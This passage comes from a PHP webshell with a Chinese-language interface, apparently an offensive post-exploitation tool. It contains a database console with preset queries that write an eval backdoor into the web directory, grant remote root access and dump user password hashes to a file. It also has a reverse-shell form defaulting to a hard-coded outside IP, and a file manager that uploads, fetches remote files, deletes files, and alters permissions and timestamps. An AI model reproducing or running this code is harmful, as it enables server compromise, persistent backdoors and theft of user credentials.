  512. if($result) { $msg .= '<h2> - 执行SQL成功</h2>'; while($array = pg_fetch_array($result)) { $rows[] = $array; } }
  513. else { $msg .= '<h1> - 执行SQL失败</h1>'; $rows = array('error' => pg_result_error($result)); }
  514. pg_free_result($result);
  515. } else {
  516. $msg = '<h1>连接'.$type.'失败</h1>';
  517. }
  518. @pg_close($dbconn);
  519. } else {
  520. $msg = '<h1>不支持'.$type.'</h1>';
  521. }
  522. break;
  523. case "MsSql" :
  524. if(function_exists('mssql_close')){
  525. $dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass);
  526. if($dbconn) {
  527. $msg = '<h2>连接'.$type.'成功 </h2>';
  528. mssql_select_db($sqlname,$dbconn);
  529. $result = mssql_query($sqlcode);
  530. if($result) { $msg .= '<h2> - 执行SQL成功</h2>'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } }
  531. else { $msg .= '<h1> - 执行SQL失败</h1>'; }
  532. @mssql_free_result($result);
  533. } else {
  534. $msg = '<h1>连接'.$type.'失败</h1>';
  535. }
  536. @mssql_close($dbconn);
  537. } else {
  538. $msg = '<h1>不支持'.$type.'</h1>';
  539. }
  540. break;
  541. case "Oracle" :
  542. if(function_exists('oci_close')){
  543. $conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname);
  544. if($conn) {
  545. $msg = '<h2>连接'.$type.'成功 </h2>';
  546. $stid = oci_parse($conn,$sqlcode);
  547. oci_execute($stid);
  548. if($stid) { $msg .= '<h2> - 执行SQL成功</h2>'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } }
  549. else { $msg .= '<h1> - 执行SQL失败</h1>'; $e = oci_error(); $rows = array('error' => $e['message']); }
  550. oci_free_statement($stid);
  551. } else {
  552. $e = oci_error(); $rows = array('error' => $e['message']);
  553. $msg = '<h1>连接'.$type.'失败</h1>';
  554. }
  555. @oci_close($conn);
  556. } else {
  557. $msg = '<h1>不支持'.$type.'</h1>';
  558. }
  559. break;
  560. case "MySql" :
  561. if(function_exists('mysql_close')){
  562. $conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname);
  563. if($conn) {
  564. $msg = '<h2>连接'.$type.'成功 </h2>';
  565. if(substr($sqlcode,0,6) == 't00lsa') {
  566. $array = array(); $data = ''; $i = 0;
  567. preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array);
  568. if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {
  569. mysql_select_db($array[1][0],$conn);
  570. mysql_query('set names '.$names,$conn);
  571. $spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`;';
  572. $result = mysql_query($spidercode,$conn);
  573. if($result) {
  574. while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join('{~}',$row)."\r\n"; $i++; }
  575. if($data) {
  576. $file = strdir($array[4][0]);
  577. $msg .= filew($file,$data,'w') ? '<h2> - 脱库成功</h2>' : '<h1> - 导出文件失败</h1>';
  578. $rows = array('file' => $file,size(filesize($file)) => '共获取'.$i.'条数据');
  579. }
  580. else { $msg .= '<h1> - 没有数据</h1>'; }
  581. }
  582. else { $msg .= '<h1> - 执行SQL失败</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }
  583. }
  584. else { $msg .= '<h1> - 脱库语句错误</h1>'; }
  585. } elseif(!empty($sqlcode)) {
  586. mysql_select_db($sqlname,$conn);
  587. mysql_query('set names '.$names,$conn);
  588. $result = mysql_query($sqlcode,$conn);
  589. if($result) { $msg .= '<h2> - 执行SQL成功</h2>'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } }
  590. else { $msg .= '<h1> - 执行SQL失败</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }
  591. }
  592. mysql_free_result($result);
  593. } else {
  594. $msg = '<h1>连接'.$type.'失败</h1>';
  595. $rows = array('errno' => mysql_errno(),'error' => mysql_error());
  596. }
  597. mysql_close($conn);
  598. } else {
  599. $msg = '<h1>不支持'.$type.'</h1>';
  600. }
  601. break;
  602. }
  603. } else {
  604. $type = 'MySql';
  605. $sqlhost = 'localhost:3306';
  606. $sqluser = 'root';
  607. $sqlpass = '123456';
  608. $sqlname = 'mysql';
  609. $sqlcode = 'select version();';
  610. $names = 'gbk';
  611. }
  612. echo '<div class="msgbox">'.$msg.'</div>';
  613. echo '<form method="POST">';
  614. subeval();
  615. echo '<input type="hidden" name="go" id="go" value="sql">';
  616. echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
  617. echo '<tr><td>支持类型</td><td>';
  618. $dbs = array('MySql','MsSql','Oracle','PostgreSql');
  619. foreach($dbs as $dbname) { echo '<label><input type="radio" name="type" value="'.$dbname.'"'.($type == $dbname ? ' checked' : '').'>'.$dbname.'</label> '; }
  620. echo '</td></tr><tr><td>连接</td><td>地址 <input type="text" name="sqlhost" style="width:188px;" value="'.$sqlhost.'"> ';
  621. echo '用户 <input type="text" name="sqluser" style="width:108px;" value="'.$sqluser.'"> ';
  622. echo '密码 <input type="text" name="sqlpass" style="width:108px;" value="'.$sqlpass.'"> ';
  623. echo '库名 <input type="text" name="sqlname" style="width:108px;" value="'.$sqlname.'"></td></tr>';
  624. echo '<tr><td>语句<br>';
  625. echo '<select onchange="$(\'sqlcode\').value=options[selectedIndex].value">';
  626. echo '<option value="select version();">---语句集合---</option>';
  627. echo '<option value="select \'<?php eval ($_POST[cmd]);?>\' into outfile \'D:/web/shell.php\';">写入文件</option>';
  628. echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \''.$sqluser.'\'@\'%\' IDENTIFIED BY \''.$sqlpass.'\' WITH GRANT OPTION;">开启外连</option>';
  629. echo '<option value="show variables;">系统变量</option>';
  630. echo '<option value="create database t00ls;">创建数据库</option>';
  631. echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;">创建数据表</option>';
  632. echo '<option value="show databases;">显示数据库</option>';
  633. echo '<option value="show tables from `'.$sqlname.'`;">显示数据表</option>';
  634. echo '<option value="show columns from `t00ls`;">显示表结构</option>';
  635. echo '<option value="drop table `t00ls`;">删除数据表</option>';
  636. echo '<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;">显示字段</option>';
  637. echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');">插入数据</option>';
  638. echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;">修改数据</option>';
  639. echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \''.THISDIR.'out.txt\';">脱库(MySql)</option>';
  640. echo '</select>';
  641. echo '</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">'.htmlspecialchars($sqlcode).'</textarea></td></tr>';
  642. echo '<tr><td>操作</td><td><select name="names">';
  643. $charsets = array('gbk','utf8','big5','latin1','cp866','ujis','euckr','koi8r','koi8u');
  644. foreach($charsets as $charset) { echo '<option value="'.$charset.'"'.($names == $charset ? ' selected' : '').'>'.$charset.'</option>'; }
  645. echo '</select> <input type="submit" style="width:80px;" value="执行"></td></tr>';
  646. echo '</table></form>';
  647. if($rows) {
  648. echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">';
  649. ob_start();
  650. print_r($rows);
  651. $out = ob_get_contents();
  652. ob_end_clean();
  653. if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) { $out = @iconv('UTF-8','GB2312//IGNORE',$out); }
  654. echo htmlspecialchars($out);
  655. echo '</pre>';
  656. }
  657. break;
  658. case "backshell" :
  659. if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {
  660. $backip = $_POST['backip'];
  661. $backport = $_POST['backport'];
  662. $temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';
  663. $type = $_POST['type'];
  664. $msg = backshell($backip,$backport,$temp,$type);
  665. } else {
  666. $backip = '222.73.219.91';
  667. $backport = '443';
  668. $temp = '/tmp';
  669. $type = 'pl';
  670. }
  671. echo '<div class="msgbox">'.$msg.'</div>';
  672. echo '<form method="POST">';
  673. subeval();
  674. echo '<input type="hidden" name="go" id="go" value="backshell">';
  675. echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
  676. echo '<tr><td>反弹地址</td><td><input type="text" name="backip" style="width:268px;" value="'.$backip.'"> (Your ip)</td></tr>';
  677. echo '<tr><td>反弹端口</td><td><input type="text" name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp '.$backport.')</td></tr>';
  678. echo '<tr><td>临时目录</td><td><input type="text" name="temp" style="width:268px;" value="'.$temp.'"> (Only Linux)</td></tr>';
  679. echo '<tr><td>反弹方法</td><td>';
  680. $types = array('pl' => 'Perl','py' => 'Python','c' => 'C-bin','pcntl' => 'Pcntl','php' => 'PHP','phpwin' => 'PHP-WS');
  681. foreach($types as $key => $name) { echo '<label><input type="radio" name="type" value="'.$key.'"'.($key == $type ? ' checked' : '').'>'.$name.'</label> '; }
  682. echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="反弹"></td></tr>';
  683. echo '</table></form>';
  684. break;
  685. case "edit" : case "editor" :
  686. $file = strdir($_POST['godir'].'/'.$_POST['govar']);
  687. $iconv = function_exists('iconv');
  688. if(!file_exists($file)) {
  689. $msg = '【新建文件】';
  690. } else {
  691. $code = filer($file);
  692. $chst = '默认';
  693. if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code) && $iconv) { $chst = 'utf-8'; $code = @iconv('UTF-8','GB2312//IGNORE',$code); }
  694. $size = size(filesize($file));
  695. $msg = '【文件属性 '.substr(decoct(fileperms($file)),-4).'】 【文件大小 '.$size.'】 【文件编码 '.$chst.'】';
  696. }
  697. echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');
  698. echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE查找内容" onclick="search($(\'keyword\').value);"> - '.$msg.'</div>';
  699. echo '<form name="editfrm" id="editfrm" method="POST">';
  700. subeval();
  701. echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';
  702. echo '<input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';
  703. echo '<div class="actall">文件 <input type="text" name="filename" value="'.$file.'" style="width:528px;"> ';
  704. if($iconv) {
  705. echo '编码 <select name="tostr">';
  706. $selects = array('normal' => '默认','utf' => 'utf-8');
  707. foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($name == $chst ? ' selected' : '').'>'.$name.'</option>'; }
  708. echo '</select>';
  709. }
  710. echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>';
  711. echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="保存" style="width:80px;"> ';
  712. echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';
  713. subeval();
  714. echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
  715. break;
  716. case "upfiles" :
  717. $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];
  718. $msg = '【最大上传文件 '.get_cfg_var("upload_max_filesize").'】 【POST最大提交数据 '.get_cfg_var("post_max_size").'】';
  719. $max = 10;
  720. if(isset($_FILES['uploads']) && isset($_POST['renames'])) {
  721. $uploads = $_FILES['uploads'];
  722. $msgs = array();
  723. for($i = 1;$i < $max;$i++) {
  724. if($uploads['error'][$i] == UPLOAD_ERR_OK) {
  725. $rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];
  726. $filea = $uploads['tmp_name'][$i];
  727. $fileb = strdir($updir.'/'.$rename);
  728. $msgs[$i] = fileu($filea,$fileb) ? '<br><h2>上传成功 '.$rename.'</h2>' : '<br><h1>上传失败 '.$rename.'</h1>';
  729. }
  730. }
  731. }
  732. echo '<div class="msgbox">'.$msg.'</div>';
  733. echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';
  734. subeval();
  735. echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';
  736. echo '<div class="actall"><p>上传到目录 <input type="text" name="updir" style="width:398px;" value="'.$updir.'"></p>';
  737. for($i = 1;$i < $max;$i++) { echo '<p>附件'.$i.' <input type="file" name="uploads['.$i.']" style="width:300px;"> 重命名 <input type="text" name="renames['.$i.']" style="width:128px;"> '.$msgs[$i].'</p>'; }
  738. echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="上传" style="width:80px;"> ';
  739. echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.$updir.'">';
  740. subeval();
  741. echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
  742. break;
  743. default :
  744. if(isset($_FILES['upfile'])) {
  745. if($_FILES['upfile']['name'] == '') { $msg = '<h1>请选择文件</h1>'; }
  746. else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? '<h2>上传文件'.$rename.'成功</h2>' : '<h1>上传文件'.$rename.'失败</h1>'; }
  747. }
  748. if(isset($_POST['act'])) {
  749. switch($_POST['act']) {
  750. case "a" :
  751. if(!$_POST['files']) { $msg = '<h1>请选择文件 '.$_POST['var'].'</h1>'; }
  752. else { $i = 0; foreach($_POST['files'] as $filename) { $i += @copy(strdir($nowdir.$filename),strdir($_POST['var'].'/'.$filename)) ? 1 : 0; } $msg = $msg = $i ? '<h2>共复制 '.$i.' 个文件到'.$_POST['var'].'成功</h2>' : '<h1>共复制 '.$i.' 个文件到'.$_POST['var'].'失败</h1>'; }
  753. break;
  754. case "b" :
  755. if(!$_POST['files']) { $msg = '<h1>请选择文件</h1>'; }
  756. else { $i = 0; foreach($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir.$filename)) ? 1 : 0; } $msg = $i ? '<h2>共删除 '.$i.' 个文件成功</h2>' : '<h1>共删除 '.$i.' 个文件失败</h1>'; }
  757. break;
  758. case "c" :
  759. if(!$_POST['files']) { $msg = '<h1>请选择文件 '.$_POST['var'].'</h1>'; }
  760. elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '<h1>属性值错误</h1>'; }
  761. else { $i = 0; foreach($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir.$filename),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '<h2>共 '.$i.' 个文件修改属性为'.$_POST['var'].'成功</h2>' : '<h1>共 '.$i.' 个文件修改属性为'.$_POST['var'].'失败</h1>'; }
  762. break;
  763. case "d" :
  764. if(!$_POST['files']) { $msg = '<h1>请选择文件 '.$_POST['var'].'</h1>'; }
  765. elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1>时间格式错误 '.$_POST['var'].'</h1>'; }
  766. else { $i = 0; foreach($_POST['files'] as $filename) { $i += @touch(strdir($nowdir.$filename),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '<h2>共 '.$i.' 个文件修改时间为'.$_POST['var'].'成功</h2>' : '<h1>共 '.$i.' 个文件修改时间为'.$_POST['var'].'失败</h1>'; }
  767. break;
  768. case "e" :
  769. $path = strdir($nowdir.$_POST['var'].'/');
  770. if(file_exists($path)) { $msg = '<h1>目录已存在 '.$_POST['var'].'</h1>'; }
  771. else { $msg = @mkdir($path,0777) ? '<h2>创建目录 '.$_POST['var'].' 成功</h2>' : '<h1>创建目录 '.$_POST['var'].' 失败</h1>'; }
  772. break;
  773. case "f" :
  774. $context = array('http' => array('timeout' => 30));
  775. if(function_exists('stream_context_create')) { $stream = stream_context_create($context); }
  776. $data = @file_get_contents ($_POST['var'],false,$stream);
  777. $filename = array_pop(explode('/',$_POST['var']));
  778. if($data) { $msg = filew(strdir($nowdir.$filename),$data,'wb') ? '<h2>下载 '.$filename.' 成功</h2>' : '<h1>下载 '.$filename.' 失败</h1>'; } else { $msg = '<h1>下载失败或不支持下载</h1>'; }
  779. break;
  780. case "rf" :
  781. $files = explode('|x|',$_POST['var']);
  782. if(count($files) != 2) { $msg = '<h1>输入错误</h1>'; }
  783. else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '<h2>重命名 '.$files[1].' 为 '.$files[0].' 成功</h2>' : '<h1>重命名 '.$files[1].' 为 '.$files[0].' 失败</h1>'; }
  784. break;
  785. case "pd" :
  786. $files = explode('|x|',$_POST['var']);
  787. if(count($files) != 2) { $msg = '<h1>输入错误</h1>'; }
  788. else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? '<h2>修改'.$files[1].'属性为'.$files[0].'成功</h2>' : '<h1>修改'.$files[1].'属性为'.$files[0].'失败</h1>'; }
  789. break;
  790. case "edit" :
  791. if(isset($_POST['filename']) && isset($_POST['filecode'])) { if($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE','UTF-8',$_POST['filecode']); } $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2>保存成功 '.$_POST['filename'].'</h2>' : '<h1>保存失败 '.$_POST['filename'].'</h1>'; }
  792. break;
  793. case "deltree" :
  794. $deldir = strdir($nowdir.$_POST['var'].'/');
  795. if(!file_exists($deldir)) { $msg = '<h1>目录 '.$_POST['var'].' 不存在</h1>'; }
  796. else { $msg = deltree($deldir) ? '<h2>删除目录 '.$_POST['var'].' 成功</h2>' : '<h1>删除目录 '.$_POST['var'].' 失败</h1>'; }
  797. break;
  798. }
  799. }
  800. $chmod = substr(decoct(fileperms($nowdir)),-4);
  801. if(!$chmod) { $msg .= ' - <h1>无法读取目录</h1>'; }
  802. $array = showdir($nowdir);
  803. $thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/');
  804. $nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22'));
  805. echo '<div class="msgbox">'.$msg.'</div>';
  806. echo '<div class="actall"><form name="frm" id="frm" method="POST">';
  807. subeval();
  808. echo (is_writable($nowdir) ? '<h2>路径</h2>' : '<h1>路径</h1>').' <input type="text" name="dir" id="dir" style="width:508px;" value="'.strdir($nowdir.'/').'"> ';
  809. echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value="转到"> ';
  810. echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value="根目录"> ';
  811. echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value="程序目录"> ';
  812. echo '<select onchange="cd(options[selectedIndex].value);">';
  813. echo '<option>---特殊目录---</option>';
  814. echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>';
  815. echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>';
  816. echo '<option value="C:/Program Files/">Win-Program</option>';
  817. echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>';
  818. echo '<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/">Win-启动</option>';
  819. echo '<option value="C:/Windows/Temp/">Win-TEMP</option>';
  820. echo '<option value="/usr/local/">Linux-local</option>';
  821. echo '<option value="/tmp/">Linux-tmp</option>';
  822. echo '<option value="/var/tmp/">Linux-var</option>';
  823. echo '<option value="/etc/ssh/">Linux-ssh</option>';
  824. echo '</select></form></div><div class="actall">';
  825. echo '<input type="button" value="新建文件" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';
  826. echo '<input type="button" value="创建目录" onclick="txts(\'目录名\',\'newdir\',\'e\');" style="width:68px;"> ';
  827. echo '<input type="button" value="下载文件" onclick="txts(\'下载文件到当前目录\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> ';
  828. echo '<input type="button" value="批量上传" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> ';
  829. echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';
  830. subeval();
  831. echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';
  832. echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';
  833. echo '<input type="button" onclick="$(\'upfrm\').submit();" value="上传" style="width:50px;"> ';
  834. echo '上传重命名为 <input type="text" name="rename" style="width:128px;">';
  835. echo '</form></div>';
  836. echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';
  837. subeval();
  838. echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';
  839. echo '<input type="hidden" name="act" id="act" value="">';
  840. echo '<input type="hidden" name="var" id="var" value="">';
  841. echo '<th><a href="javascript:cd(\''.dirname($nowdir).'/\');">上级目录</a></th><th style="width:8%">操作</th><th style="width:5%">属性</th><th style="width:17%">创建时间</th><th style="width:17%">修改时间</th><th style="width:8%">下载</th>';
  842. if($array) {
  843. asort($array['dir']);
  844. asort($array['file']);
  845. $dnum = $fnum = 0;
  846. foreach($array['dir'] as $path => $name) {
  847. $prem = substr(decoct(fileperms($path)),-4);
  848. $ctime = date('Y-m-d H:i:s',filectime($path));
  849. $mtime = date('Y-m-d H:i:s',filemtime($path));
  850. echo '<tr>';
  851. echo '<td><a href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27' => '\'','%22' => '"')).'</b></a></td>';
  852. echo '<td><a href="javascript:dels(\''.$name.'\');">删除</a> ';
  853. echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');">改名</a></td>';
  854. echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
  855. echo '<td>'.$ctime.'</td>';
  856. echo '<td>'.$mtime.'</td>';
  857. echo '<td>-</td>';
  858. echo '</tr>';
  859. $dnum++;
  860. }
  861. foreach($array['file'] as $path => $name) {
  862. $prem = substr(decoct(fileperms($path)),-4);
  863. $ctime = date('Y-m-d H:i:s',filectime($path));
  864. $mtime = date('Y-m-d H:i:s',filemtime($path));
  865. $size = size(filesize($path));
  866. echo '<tr>';
  867. echo '<td><input type="checkbox" name="files[]" value="'.$name.'"><a target="_blank" href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22' => '"')).'</a></td>';
  868. echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');">编辑</a> ';
  869. echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');">改名</a></td>';
  870. echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
  871. echo '<td>'.$ctime.'</td>';
  872. echo '<td>'.$mtime.'</td>';
  873. echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>';
  874. echo '</tr>';
  875. $fnum++;
  876. }
  877. }
  878. unset($array);
  879. echo '</table>';
  880. echo '<div class="actall" style="text-align:left;">';
  881. echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';
  882. echo '<input type="button" value="复制" style="width:50px;" onclick=\'txts("复制路径","'.$nowdir.'","a");\'> ';
  883. echo '<input type="button" value="删除" style="width:50px;" onclick=\'dels("b");\'> ';
  884. echo '<input type="button" value="属性" style="width:50px;" onclick=\'txts("属性值","0666","c");\'> ';
  885. echo '<input type="button" value="时间" style="width:50px;" onclick=\'txts("修改时间","'.$mtime.'","d");\'> ';
  886. echo '目录['.$dnum.'] - 文件['.$fnum.'] - 属性['.$chmod.']</div></form>';
  887. break;
  888. }